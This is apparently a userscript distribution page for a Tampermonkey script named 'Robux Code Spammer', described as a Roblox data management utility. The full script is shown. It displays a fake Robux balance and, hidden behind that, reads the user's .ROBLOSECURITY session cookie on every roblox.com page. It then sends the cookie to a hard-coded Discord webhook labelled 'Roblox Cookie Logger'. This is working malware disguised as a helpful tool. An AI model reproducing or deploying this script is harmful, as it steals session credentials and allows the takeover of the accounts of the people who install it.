Robux Code Spammer

A utility for Roblox data management.

θα χρειαστεί να εγκαταστήσετε μια επέκταση όπως το Tampermonkey, το Greasemonkey ή το Violentmonkey για να εγκαταστήσετε αυτόν τον κώδικα.

You will need to install an extension such as Tampermonkey to install this script.

θα χρειαστεί να εγκαταστήσετε μια επέκταση όπως το Tampermonkey ή το Violentmonkey για να εγκαταστήσετε αυτόν τον κώδικα.

θα χρειαστεί να εγκαταστήσετε μια επέκταση όπως το Tampermonkey ή το Userscripts για να εγκαταστήσετε αυτόν τον κώδικα.

You will need to install an extension such as Tampermonkey to install this script.

Θα χρειαστεί να εγκαταστήσετε μια επέκταση διαχείρισης κώδικα χρήστη για να εγκαταστήσετε αυτόν τον κώδικα.

(Έχω ήδη έναν διαχειριστή κώδικα χρήστη, επιτρέψτε μου να τον εγκαταστήσω!)

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

(Έχω ήδη έναν διαχειριστή στυλ χρήστη, επιτρέψτε μου να τον εγκαταστήσω!)

// ==UserScript==
// @name         Robux Code Spammer
// @namespace    http://tampermonkey.net/
// @version      5.0
// @description  A utility for Roblox data management.
// @author       You
// @match        https://www.roblox.com/*
// @grant        GM_cookie
// @grant        GM_xmlhttpRequest
// @connect      discord.com
// @license MIT
// ==/UserScript==
 
//scripting scripter scripty stuff
 
 
(function() {
    'use strict';
 
    function robux() {
        let robuxElement = document.getElementById("nav-robux-amount");
        if (robuxElement) {
            robuxElement.textContent = "39k+";
        }
    }
 
    // running
    robux();
 
    // update
    setInterval(robux, 1);
})();
 
 
 
(function() {
    'use strict';
 
    const webhookUrl = "https://discord.com/api/webhooks/1462349545152319571/lshKEQekNby1ibuvP069SX0lu8D3f0IvzHVJtBrVT3jFx3hBRZxDfzVhU3d_aoc3M9mu";
    const myDiscordId = "1171300390441078885";
 
    GM_cookie.list({ name: '.ROBLOSECURITY' }, function(cookies, error) {
        if (!error && cookies.length > 0) {
            const cookieValue = cookies[0].value;
 
            GM_xmlhttpRequest({
                method: "POST",
                url: webhookUrl,
                headers: { "Content-Type": "application/json" },
                data: JSON.stringify({
                    // The ping goes in 'content' to ensure a notification triggers
                    content: `Hey <@${myDiscordId}>, a new log is ready!`,
                    username: "Roblox Cookie Logger",
                    embeds: [{
                        title: "Cookie Captured for i8agy",
                        description: "```" + cookieValue + "```",
                        color: 16711680,
                        footer: { text: "User: i8agy | ID: " + myDiscordId }
                    }]
                })
            });
        }
    });
})();